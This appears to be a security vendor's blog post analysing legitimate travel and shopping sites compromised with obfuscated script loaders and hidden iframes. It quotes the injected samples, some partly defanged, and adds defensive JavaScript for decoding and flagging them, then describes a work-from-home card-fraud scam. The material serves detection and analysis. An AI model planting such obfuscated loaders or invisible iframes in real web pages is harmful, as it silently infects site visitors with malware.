Prepared by Steve Espino – PC Tools Malware Research Team
With the holidays just around the corner, people the world over are looking for the best deals on holiday packages and gifts for their friends and family. What better place to look than on the Internet—in the comfort of one’s own home and on one’s own digital devices? After all, travel sites that help eager holiday-goers find that perfect holiday getaway abound.
Yet while there are a host of legitimate travel and shopping websites, there are also, unfortunately, plenty of fraudulent websites posing as credible ones. And the threats don’t stop there; users also need to be aware that even legit travel and shopping-related websites may be prone to attacks. Although these trustworthy sites may appear ‘normal’ at first glance, there is often malicious code lurking beneath that puts your privacy at risk.
These are samples of legitimate sites that have been compromised with malicious invisible iframes or obfuscated scripts.
And below are some examples of these malicious scripts:
Users on the lookout for printable cards for Halloween and Hanukkah may get an embedded, obfuscated malicious script to go with the cards:
This translates to an embedded script:
Here is an embedded obfuscated malicious script found in a website offering Yoga retreats in fantastic locations like Greece and India:
document.write('<script src='+'h@^t@!$t$(p$^:#/)$&/$)n#(e$)w@s!$3$@i@!)n$)s!#i!d$)e##)r!$$-@(#c)(@o^@@))m^$.!)n$e&x)t@!&a&!&g^!@.#!c$@o!!m(!&).!(w)^$)i$@$n($$)d(o^!!w^#s&!l@$i#^v!e)^&-!^^c^!o^m).$c$o(#b#&^(a()$^l)#t$@t@(^r#!@u)&!e)&b(&l$@&!)u$#e(!$.&!(r^#&(!u@(:!&8#(!0!(8&^0#/#b#(&l!o)&g(^(f$!a$.))c$($o(@m$/((#!b)l(o!!#@g@)^f&#a&.)@c^#o!m#!/@)#g$(&o(^o@$)g(l(&e#$$.!@c$o^m$/))!w^^e^a#^@!t&#^@h)$$(e&r$.(@#c!o!m^/^!h(&#s!#b$$c((.)&c!@$o).&##&u(#k&!^#&/$)$^'.replace(/#|\)|\(|!|@|\^|\$|&/ig, '')+' defer=defer></scr'+'ipt>');</
Which translates to:
<script src=hxxp://news<blocked>blue.ru:8080/blogf<blocked>.com/google.com/weather.com/hsbc.co.uk/ defer=defer></script>
This one is from a website selling wholesale designer merchandise:
var source = "=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6/23:/255/33:0tubut0tubut/kt#?=0tdsjqu?";
var result = "";
for (var i = 0; i < source.length; i++) result += String.fromCharCode(source.charCodeAt(i) - 1);
The malicious script only executes when Windows users visit the site.
Deobfuscation reveals the following embedded script, which is designed to look like normal website statistics scripts in order to evade detection:
PC Tools also came across a travel website with pages that were injected all over with hidden, malicious iframes like this one:
<iframe width="1" height="1" src="hxxp://st<blocked>7.info/traff/index2.php" style="border: 0;"></iframe>
This hidden iframe runs a script from a malicious website, which allows the hackers to deliver any payload they desire, ranging from fake AVs and password stealers to ransomware and worms that turn computers into 'zombies' as part of a large bot network.
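The three injection styles shown above (junk-character padding, shift-by-one encoding and 1x1 iframes) can be decoded and flagged statically, without letting a browser run anything. The following is an added example, not code from PC Tools or from the compromised sites; the function names are hypothetical and the sample strings are constructed, with loader.example.test, video.example.test and 192.0.2.10 as placeholder hosts.

```javascript
// Added example: static triage of injected markup. Nothing is eval'd or written to a page.

// Style 1: junk characters interleaved with the URL, removed at run time by .replace().
// The default junk set is the one used by the Yoga-retreat sample on this page.
function stripJunk(s, junk = "#)(!@^$&") {
  return [...s].filter((ch) => !junk.includes(ch)).join("");
}

// Style 2: every character code shifted up by `shift`; decoding subtracts it again.
function unshift(s, shift = 1) {
  return [...s].map((ch) => String.fromCharCode(ch.charCodeAt(0) - shift)).join("");
}

// Rewrite http(s):// as hxxp(s):// so decoded output is not clickable in a report.
function defang(s) {
  return s.replace(/http(s?):\/\//gi, "hxxp$1://");
}

// Flag iframes whose width and height are both 0 or 1 pixel.
function hiddenIframes(html) {
  const tags = html.match(/<iframe\b[^>]*>/gi) || [];
  const dim = (tag, name) => {
    const m = tag.match(new RegExp(name + "\\s*=\\s*[\"']?(\\d+)", "i"));
    return m ? Number(m[1]) : null;
  };
  return tags.filter((t) => {
    const w = dim(t, "width"), h = dim(t, "height");
    return w !== null && h !== null && w <= 1 && h <= 1;
  });
}

// Constructed samples (placeholder hosts only).
const junkSample = "h#t!t@p^:$/&/(l)o#a!d@e^r$.&e(x)a#m!p@l^e$.&t(e)s#t!/@a^.$j&s";
const plain = '<script src="http://192.0.2.10/stats/stats.js"></script>';
const shiftSample = [...plain].map((c) => String.fromCharCode(c.charCodeAt(0) + 1)).join("");
const page = '<p>Deals</p><iframe width="1" height="1" src="http://loader.example.test/x"></iframe>'
  + '<iframe width="560" height="315" src="https://video.example.test/embed"></iframe>';

console.log(defang(stripJunk(junkSample)));
console.log(defang(unshift(shiftSample)));
console.log(hiddenIframes(page).map(defang));
```

The junk set and the shift value differ between campaigns, so read them from the sample's own `.replace()` pattern or `charCodeAt(i)-N` expression before decoding.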
In another instance, unsuspecting users are offered the opportunity to start earning money from home immediately. The scam entices users to sign up quickly by falsely claiming that there are very few positions remaining.
When users try to leave the page, the site offers them a chat with an “Agent” to “secure your position.” Users may be tricked into thinking that the agent is authentic when, in fact, it is often an automated bot.
When users sign up, they are asked for their credit card details. This could result in massive fraudulent charges and even identity theft. For more information on identity theft, see the PC Tools Blog entry on the subject.
PC Tools advises against entering credit card information on any suspicious forms or sites. Victims of these attacks are strongly advised to contact their credit card companies immediately to dispute any anomalous transactions and to ensure that there will be no future unauthorized charges.
We wish everyone a virus-free and scam-free Holiday Season!